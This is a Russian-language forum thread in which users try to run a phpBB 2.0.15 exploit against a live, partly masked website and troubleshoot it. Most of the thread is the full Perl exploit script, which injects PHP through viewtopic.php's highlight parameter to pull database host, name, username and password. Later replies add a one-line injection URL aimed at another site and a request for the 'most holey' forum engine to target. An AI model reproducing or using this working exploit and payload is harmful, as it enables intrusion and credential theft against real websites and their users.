|
Вопрос по сплоиту phpBB <= 2.0.15
C:\Documents and Settings\M@rtein>spl.pl www.***.com /forums/ 10866
+-----------------------------------------------------------------------+ | PhpBB 2.0.15 Database Authentication Details Exploit | | By SecureD gvr.secured<AT>gmail<DOT>com | +-----------------------------------------------------------------------+ [+] Connecting OK [+] Sending exploit OK [+] Database Host: [+] Database Name: [+] Username: [+] Password: C:\Documents and Settings\M@rtein> Подскажите что не так, возможно где то в коде сплоита что то исправить нужно? |
Цитата:
========================== а твой сплоит - приват ? или трафик экономишь ? или у тебя есть другие причины не вылажить тут его !? ---------------------------------------------- не я конечно понимаю, что можно залезть на милворм и среди сплоитов под эту версию найти в котором есть строчка By SecureD gvr.secured<AT>gmail<DOT>com | :D | :D | :D |
Чето не сообразил =(
#!/usr/bin/perl
# tested and working /str0ke # ************************************************** ****************** # ************************************************** ******************** # **** ** # *** ****** ******************* ** # *** *** **** *********************** ** # *** *** **** **** * *** ***** ** # *** *** *** *** *** * ** ** ** ** # *** *** *** ** ** ** ** ** #*** *** *** *** ** ** ***** ** #** *** *** **** ** ** ** ** #** *** *** *** ******* ******* ** *** ** ** #** *** *** *** ** *** *** ** ** ** ** ** #** *** *** *** ** *** *** *** ***** ** #** *** *** *** ** *** *** ** #** **** *** **** *** *** ** #** ******* **** ******** *********************************** ** #** *** ** #** *** ** #** ** #** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability ** #** This exploit gives the user all the details about the database ** #** connection such as database host, username, password and ** #** database name. ** #** ** #** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 ** #** ** #** Greetings to GvR, Jumento, PP, CKrew & friends ** #** ** #************************************************* **************************** # ************************************************** ************************* use IO::Socket; print "+-----------------------------------------------------------------------+\r\n"; print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n"; print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n"; print "+-----------------------------------------------------------------------+\r\n"; if (@ARGV < 3) { print "Usage:\r\n"; print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n"; print "SERVER - Server where PhpBB is installed.\r\n"; print "DIR - PHPBB directory or / for no directory.\r\n"; print "THREADID - Id of an existing thread.\r\n"; print "COOKIESTRING - Optional, cookie string of the http request.\r\n"; print " Use this when a thread needs authentication for viewing\r\n"; print " You can use Firefox in combination with \"Live HTTP\r\n"; print " Headers\" to get this cookiestring.\r\n\r\n"; print "Example 1 (with cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologi nid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs %3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n"; print "Example 2 (without cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n"; exit(); } $serv = $ARGV[0]; $dir = $ARGV[1]; $threadid = $ARGV[2]; $cookie = $ARGV[3]; $serv =~ s/http:\/\///ge; $delimit = "GvRSecureD"; $sploit = $dir . "viewtopic.php?t="; $sploit .= $threadid; $sploit .= "&highlight='.printf($delimit."; $sploit .= "\$dbhost."; $sploit .= "$delimit."; $sploit .= "\$dbname."; $sploit .= "$delimit."; $sploit .= "\$dbuser."; $sploit .= "$delimit."; $sploit .= "\$dbpasswd."; $sploit .= "$delimit).'"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n"; print "[+] Connecting OK\n"; sleep(1); print "[+] Sending exploit "; print $sock "GET $sploit HTTP/1.1\r\n"; print $sock "Host: $serv\r\n"; if ( defined $cookie) { print $sock "Cookie: $cookie \r\n"; } print $sock "Connection: close\r\n\r\n"; $succes = 0; while ($answer = <$sock>) { $delimitIndex = index $answer, $delimit; if ($delimitIndex >= 0) { $succes = 1; $urlIndex = index $answer, "href"; if ($urlIndex < 0){ $answer = substr($answer, length($delimit)); $length = 0; while (length($answer) > 0) { $nex = index($answer, $delimit); if ($nex > 0) { push(@array, substr($answer, 0, $nex)); $answer = substr($answer, $nex + length($delimit), length($answer)); } else { $answer= ""; } } } } } close($sock); if ($succes == 1) { print "OK\n"; sleep(1); print "[+] Database Host: " . $array[0] . "\n"; sleep(1); print "[+] Database Name: " . $array[1] . "\n"; sleep(1); print "[+] Username: " . $array[2] . "\n"; sleep(1); print "[+] Password: " . $array[3] . "\n"; sleep(1); } else { print "FAILED\n"; } # milw0rm.com [2005-07-03] |
ничего не надо править, просто он там не пашет , где ты его юзаешь!
Попробуй вот это http://milw0rm.com/exploits/1076 или просто http://xaked.com/forum/viewtopic.php?t=[номер_топика]&highlight=%%27. Т.е. фактически таже ошибка была в 2.0.10 версии %27))_ |
Скачал себе 2.0.13 с sourceforge, нихрена не работает!
Можешь написать адрес, как вывести phpinfo() ? И какой кстати сейчас самый дырявый движок? |
бамп
|
| Время: 22:57 |